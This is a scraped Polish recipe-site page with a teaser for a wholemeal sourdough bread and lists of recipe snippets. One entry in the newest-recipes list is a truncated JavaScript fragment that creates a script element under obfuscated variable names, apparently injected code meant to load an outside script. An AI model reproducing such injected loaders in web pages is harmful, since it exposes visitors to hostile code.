FIT RAZOWIEC
Źródło: http://apetytnasmaka.blogspot.com/2019/12/fit-razowiec.html
Wśród chlebów na zakwasie mamy swoich domowych ulubieńców , ale ile po jakimś czasie ma się juz przesyt jednego, konkretnego pieczywa. Dlatego zaczęłam się rozglądać za przepisem na nowy chlebek i tak oto natrafiłam na przepis z bloga Addio Pomidory na razowiec - na blogu opisany jak wyjątkowy i faktycznie taki jest! Zwłaszcza świeżutki z chrupką skórką i intensywnym...
Najnowsze przepisy
Śledzie gajowego z suszonymi borowikami (po myśliwsku)Są... ⇖ 19
(function(){ ak45=document.createElement("script");ak45_="o" ⇖ 10
Batat z pieca, lekko przypieczony na krawędziach i kremowy... ⇖ 22
Domowy chleb z ziarnami – puszysty, aromatyczny i idealny... ⇖ 18
Przepisy z bloga
Canelloni ze szpinakiem, delikatną ricottą i parmezanem... ⇖ 931
Dziś mam dla was przepis na mój ulubiony sernik. Jest... ⇖ 10411
Kurczak po koreańsku jest moim najnowszym odkryciem i... ⇖ 4228
Po raz pierwszy sprobowalam tacosow rok temu i szczerze... ⇖ 990
Ten sernik przygotowuje juz czwarty raz w przeciagu dwoch... ⇖ 856
Uwielbiam to polaczenie-kruche ciasto i krem waniliowy. Do... ⇖ 1659
Czasem mam takie dni, kiedy przez caly dzien jadlabym tylko... ⇖ 1032
Ostatnio zaczelam doceniac zdrowotne wlasciwosci kurkumy i... ⇖ 957
Jesli jeszcze nie macie dosc slodkosci po tym swiatecznym... ⇖ 895
Nie bede ukrywala, ze uwielbiam hummus i robie go ostatnio... ⇖ 925
Przepisy na czasie
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 1820
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1194
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 705
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 697
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 614
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 603
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 566
Przepyszny domowy pasztet do smarowania. W sklepie tak... ⇖ 491
Pyszny, mięciutki i delikatny. Idealne na półmisek... ⇖ 481
Paszteciki z mięsem, z ciasta drożdżowo-kruchego to... ⇖ 467









































